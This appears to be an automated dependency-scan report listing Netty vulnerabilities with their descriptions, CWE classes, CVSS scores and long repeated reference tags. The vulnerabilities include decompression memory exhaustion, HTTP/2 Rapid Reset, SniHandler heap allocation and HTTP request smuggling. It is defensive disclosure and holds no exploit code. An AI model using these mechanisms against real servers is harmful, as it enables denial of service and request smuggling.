ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation OSSIndex - https://github.com/netty/netty/issues/9924 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-47535 (OSSINDEX) suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crashes. This vulnerability is fixed in 4.1.115. CWE-400 Uncontrolled Resource Consumption
CVSSv2:
Base Score: MEDIUM (6.800000190734863) Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-common:4.1.23.Final:*:*:*:*:*:*:* CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
